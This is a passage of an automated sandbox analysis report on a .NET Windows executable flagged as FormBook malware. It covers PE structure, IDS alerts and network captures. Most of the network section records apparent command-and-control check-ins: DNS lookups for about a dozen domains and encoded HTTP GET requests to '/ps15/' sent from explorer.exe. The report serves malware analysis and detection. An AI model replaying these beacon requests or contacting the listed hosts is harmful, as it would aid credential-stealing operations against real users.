                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc541c0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x800.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xc34740xc3600b6c0babd663553a14388f6ef241ed633False0.8891067358445297data7.7959310845493555IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc60000x8000x8007422783d6a477a5df9845eded19fbcebFalse0.33544921875data3.4434375059751887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc80000xc0x2005d60b7409e592bb99f8937ffc4a54be2False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0xc60900x390data0.4232456140350877
                                                        RT_MANIFEST0xc64300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                        2024-07-23T18:28:45.882006+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390280192.168.2.7172.96.187.60
                                                        2024-07-23T18:31:48.971715+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390980192.168.2.7184.154.46.218
                                                        2024-07-23T18:32:14.054099+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5391080192.168.2.7103.56.204.76
                                                        2024-07-23T18:29:46.592917+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390480192.168.2.7154.86.16.125
                                                        2024-07-23T18:29:06.265172+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390380192.168.2.7198.185.159.144
                                                        2024-07-23T18:32:32.849943+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5391180192.168.2.723.227.38.74
                                                        2024-07-23T18:30:06.593953+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390580192.168.2.723.227.38.74
                                                        2024-07-23T18:31:28.381840+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390880192.168.2.7172.67.214.13
                                                        2024-07-23T18:30:47.257969+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390780192.168.2.71.32.249.49
                                                        2024-07-23T18:30:26.792714+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)5390680192.168.2.735.204.150.5

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 23, 2024 18:28:45.393340111 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.398197889 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:28:45.398303986 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.398363113 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.403131008 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:28:45.880321980 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:28:45.881122112 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:28:45.881302118 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.881373882 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.881867886 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:28:45.882005930 CEST5390280192.168.2.7172.96.187.60
                                                        Jul 23, 2024 18:28:45.886152029 CEST8053902172.96.187.60192.168.2.7
                                                        Jul 23, 2024 18:29:05.733191013 CEST5390380192.168.2.7198.185.159.144
                                                        Jul 23, 2024 18:29:05.750376940 CEST8053903198.185.159.144192.168.2.7
                                                        Jul 23, 2024 18:29:05.751193047 CEST5390380192.168.2.7198.185.159.144
                                                        Jul 23, 2024 18:29:05.751194000 CEST5390380192.168.2.7198.185.159.144
                                                        Jul 23, 2024 18:29:05.766720057 CEST8053903198.185.159.144192.168.2.7
                                                        Jul 23, 2024 18:29:06.251101017 CEST5390380192.168.2.7198.185.159.144
                                                        Jul 23, 2024 18:29:06.264987946 CEST8053903198.185.159.144192.168.2.7
                                                        Jul 23, 2024 18:29:06.265172005 CEST5390380192.168.2.7198.185.159.144
                                                        Jul 23, 2024 18:29:45.970545053 CEST5390480192.168.2.7154.86.16.125
                                                        Jul 23, 2024 18:29:45.976159096 CEST8053904154.86.16.125192.168.2.7
                                                        Jul 23, 2024 18:29:45.976228952 CEST5390480192.168.2.7154.86.16.125
                                                        Jul 23, 2024 18:29:45.976314068 CEST5390480192.168.2.7154.86.16.125
                                                        Jul 23, 2024 18:29:45.981715918 CEST8053904154.86.16.125192.168.2.7
                                                        Jul 23, 2024 18:29:46.488523960 CEST5390480192.168.2.7154.86.16.125
                                                        Jul 23, 2024 18:29:46.537535906 CEST8053904154.86.16.125192.168.2.7
                                                        Jul 23, 2024 18:29:46.592556000 CEST8053904154.86.16.125192.168.2.7
                                                        Jul 23, 2024 18:29:46.592916965 CEST5390480192.168.2.7154.86.16.125
                                                        Jul 23, 2024 18:30:06.061840057 CEST5390580192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:30:06.066808939 CEST805390523.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:30:06.067115068 CEST5390580192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:30:06.067115068 CEST5390580192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:30:06.072477102 CEST805390523.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:30:06.581896067 CEST5390580192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:30:06.588037014 CEST805390523.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:30:06.593952894 CEST5390580192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:30:26.268759966 CEST5390680192.168.2.735.204.150.5
                                                        Jul 23, 2024 18:30:26.273720980 CEST805390635.204.150.5192.168.2.7
                                                        Jul 23, 2024 18:30:26.273798943 CEST5390680192.168.2.735.204.150.5
                                                        Jul 23, 2024 18:30:26.273886919 CEST5390680192.168.2.735.204.150.5
                                                        Jul 23, 2024 18:30:26.278755903 CEST805390635.204.150.5192.168.2.7
                                                        Jul 23, 2024 18:30:26.785917044 CEST5390680192.168.2.735.204.150.5
                                                        Jul 23, 2024 18:30:26.791812897 CEST805390635.204.150.5192.168.2.7
                                                        Jul 23, 2024 18:30:26.792714119 CEST5390680192.168.2.735.204.150.5
                                                        Jul 23, 2024 18:30:46.659884930 CEST5390780192.168.2.71.32.249.49
                                                        Jul 23, 2024 18:30:46.665326118 CEST80539071.32.249.49192.168.2.7
                                                        Jul 23, 2024 18:30:46.665523052 CEST5390780192.168.2.71.32.249.49
                                                        Jul 23, 2024 18:30:46.665523052 CEST5390780192.168.2.71.32.249.49
                                                        Jul 23, 2024 18:30:46.670418978 CEST80539071.32.249.49192.168.2.7
                                                        Jul 23, 2024 18:30:47.157960892 CEST5390780192.168.2.71.32.249.49
                                                        Jul 23, 2024 18:30:47.209610939 CEST80539071.32.249.49192.168.2.7
                                                        Jul 23, 2024 18:30:47.251888037 CEST80539071.32.249.49192.168.2.7
                                                        Jul 23, 2024 18:30:47.257968903 CEST5390780192.168.2.71.32.249.49
                                                        Jul 23, 2024 18:32:32.318103075 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.323065042 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.323151112 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.323191881 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.328038931 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.829431057 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.849812984 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.849942923 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.850794077 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.850830078 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.850913048 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.853863955 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.853897095 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.853935003 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.854017019 CEST5391180192.168.2.723.227.38.74
                                                        Jul 23, 2024 18:32:32.856157064 CEST805391123.227.38.74192.168.2.7
                                                        Jul 23, 2024 18:32:32.856215954 CEST5391180192.168.2.723.227.38.74

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 23, 2024 18:28:25.759831905 CEST53541401.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:28:27.398617029 CEST53533571.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:28:45.001557112 CEST5701153192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:28:45.392530918 CEST53570111.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:29:05.626183033 CEST6398353192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:29:05.728339911 CEST53639831.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:29:25.079246044 CEST6009053192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:29:25.099503994 CEST53600901.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:29:45.360580921 CEST5609053192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:29:45.969567060 CEST53560901.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:30:05.798382044 CEST6141853192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:30:06.060776949 CEST53614181.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:30:26.192321062 CEST5798453192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:30:26.267883062 CEST53579841.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:30:46.642213106 CEST4931153192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:30:46.657553911 CEST53493111.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:31:07.193861961 CEST6033753192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:31:07.210998058 CEST53603371.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:31:27.846740961 CEST5115053192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:31:27.868928909 CEST53511501.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:31:48.270977974 CEST6066053192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:31:48.374449968 CEST53606601.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:32:13.199825048 CEST6125653192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:32:13.397809029 CEST53612561.1.1.1192.168.2.7
                                                        Jul 23, 2024 18:32:32.048837900 CEST6224153192.168.2.71.1.1.1
                                                        Jul 23, 2024 18:32:32.317480087 CEST53622411.1.1.1192.168.2.7

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jul 23, 2024 18:28:45.001557112 CEST192.168.2.71.1.1.10xe196Standard query (0)www.resmierabaru20.shopA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.626183033 CEST192.168.2.71.1.1.10x1a9aStandard query (0)www.thepeacedealers.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:25.079246044 CEST192.168.2.71.1.1.10xacc0Standard query (0)www.casinomaxnodepositbonus.icuA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.360580921 CEST192.168.2.71.1.1.10xe386Standard query (0)www.33pgaaa.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:05.798382044 CEST192.168.2.71.1.1.10xa18fStandard query (0)www.ellipsive.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:26.192321062 CEST192.168.2.71.1.1.10x35b6Standard query (0)www.mayson-wedding.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:46.642213106 CEST192.168.2.71.1.1.10x8918Standard query (0)www.gmgex1.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:07.193861961 CEST192.168.2.71.1.1.10x6737Standard query (0)www.passrmale.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:27.846740961 CEST192.168.2.71.1.1.10x58f5Standard query (0)www.trezorsuite.netA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:48.270977974 CEST192.168.2.71.1.1.10x72edStandard query (0)www.gomenasorry.comA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:32:13.199825048 CEST192.168.2.71.1.1.10x24b9Standard query (0)www.briefout.cloudA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:32:32.048837900 CEST192.168.2.71.1.1.10xcd49Standard query (0)www.kaidifeiniroo.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jul 23, 2024 18:28:45.392530918 CEST1.1.1.1192.168.2.70xe196No error (0)www.resmierabaru20.shopresmierabaru20.shopCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:28:45.392530918 CEST1.1.1.1192.168.2.70xe196No error (0)resmierabaru20.shop172.96.187.60A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.728339911 CEST1.1.1.1192.168.2.70x1a9aNo error (0)www.thepeacedealers.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.728339911 CEST1.1.1.1192.168.2.70x1a9aNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.728339911 CEST1.1.1.1192.168.2.70x1a9aNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.728339911 CEST1.1.1.1192.168.2.70x1a9aNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:05.728339911 CEST1.1.1.1192.168.2.70x1a9aNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:25.099503994 CEST1.1.1.1192.168.2.70xacc0Name error (3)www.casinomaxnodepositbonus.icunonenoneA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)www.33pgaaa.comwww.33pgaaa.com.dns.jiashuba.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)www.33pgaaa.com.dns.jiashuba.comwww.33pgaaa.com.sspeeddns.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)www.33pgaaa.com.sspeeddns.comss-k2-ss-k2.sspeeddns.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)ss-k2-ss-k2.sspeeddns.com154.86.16.125A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)ss-k2-ss-k2.sspeeddns.com23.224.212.27A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)ss-k2-ss-k2.sspeeddns.com61.4.127.87A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:29:45.969567060 CEST1.1.1.1192.168.2.70xe386No error (0)ss-k2-ss-k2.sspeeddns.com143.92.52.237A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:06.060776949 CEST1.1.1.1192.168.2.70xa18fNo error (0)www.ellipsive.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:30:06.060776949 CEST1.1.1.1192.168.2.70xa18fNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:26.267883062 CEST1.1.1.1192.168.2.70x35b6No error (0)www.mayson-wedding.comwebsite-rendering.webador.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:30:26.267883062 CEST1.1.1.1192.168.2.70x35b6No error (0)website-rendering.webador.comwebsite-rendering.jouwweb.nlCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:30:26.267883062 CEST1.1.1.1192.168.2.70x35b6No error (0)website-rendering.jouwweb.nl35.204.150.5A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:30:46.657553911 CEST1.1.1.1192.168.2.70x8918No error (0)www.gmgex1.com1.32.249.49A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:07.210998058 CEST1.1.1.1192.168.2.70x6737Name error (3)www.passrmale.comnonenoneA (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:27.868928909 CEST1.1.1.1192.168.2.70x58f5No error (0)www.trezorsuite.net172.67.214.13A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:27.868928909 CEST1.1.1.1192.168.2.70x58f5No error (0)www.trezorsuite.net104.21.86.19A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:31:48.374449968 CEST1.1.1.1192.168.2.70x72edNo error (0)www.gomenasorry.comgomenasorry.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:31:48.374449968 CEST1.1.1.1192.168.2.70x72edNo error (0)gomenasorry.com184.154.46.218A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:32:13.397809029 CEST1.1.1.1192.168.2.70x24b9No error (0)www.briefout.cloudbriefout.cloudCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:32:13.397809029 CEST1.1.1.1192.168.2.70x24b9No error (0)briefout.cloud103.56.204.76A (IP address)IN (0x0001)false
                                                        Jul 23, 2024 18:32:32.317480087 CEST1.1.1.1192.168.2.70xcd49No error (0)www.kaidifeiniroo.netshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                        Jul 23, 2024 18:32:32.317480087 CEST1.1.1.1192.168.2.70xcd49No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.resmierabaru20.shop
                                                        • www.thepeacedealers.com
                                                        • www.33pgaaa.com
                                                        • www.ellipsive.com
                                                        • www.mayson-wedding.com
                                                        • www.gmgex1.com
                                                        • www.kaidifeiniroo.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.753902172.96.187.60804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:28:45.398363113 CEST186OUTGET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== HTTP/1.1
                                                        Host: www.resmierabaru20.shop
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 23, 2024 18:28:45.880321980 CEST1236INHTTP/1.1 200 OK
                                                        Date: Tue, 23 Jul 2024 16:28:45 GMT
                                                        Content-Length: 1467
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                        Cache-Control: no-store, max-age=0
                                                        Server: imunify360-webshield/1.21
                                                        Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                        Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!
                                                        Jul 23, 2024 18:28:45.881122112 CEST487INData Raw: 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72
                                                        Data Ascii: ![]+!![]+!![]+!![]+[])+(+![])+(+![]+[])+(+!+[]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attac


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.753903198.185.159.144804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:29:05.751194000 CEST186OUTGET /ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.thepeacedealers.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.753904154.86.16.125804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:29:45.976314068 CEST178OUTGET /ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.33pgaaa.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.75390523.227.38.74804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:30:06.067115068 CEST180OUTGET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== HTTP/1.1
                                                        Host: www.ellipsive.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.75390635.204.150.5804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:30:26.273886919 CEST185OUTGET /ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.mayson-wedding.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.7539071.32.249.49804056C:\Windows\explorer.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:30:46.665523052 CEST177OUTGET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== HTTP/1.1
                                                        Host: www.gmgex1.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.75391123.227.38.7480
                                                        TimestampBytes transferredDirectionData
                                                        Jul 23, 2024 18:32:32.323191881 CEST184OUTGET /ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.kaidifeiniroo.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 23, 2024 18:32:32.849812984 CEST1236INHTTP/1.1 403 Forbidden
                                                        Date: Tue, 23 Jul 2024 16:32:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4514
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Referrer-Policy: same-origin
                                                        Cache-Control: max-age=15
                                                        Expires: Tue, 23 Jul 2024 16:32:47 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTvpXyb%2BSeOxPw0qfZqdVYrhk0bD8wHuyWRKMZvHGN7KkyFmSadcxRdgYjPjnnCfXy%2B9e8gLGunCJMD6HNGJzbKrGOicX%2B1iqkuqf7J4E7MU4VSlLXYVUqIpSdRAzvvVCLYZxo4FyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Server-Timing: cfRequestDuration;dur=13.000011
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        X-Permitted-Cross-Domain-Policies: none
                                                        X-Download-Options: noopen
                                                        Server: cloudflare
                                                        CF-RAY: 8a7d112cc8f47c90-EWR
                                                        alt-svc: h3=":443"; ma=86400
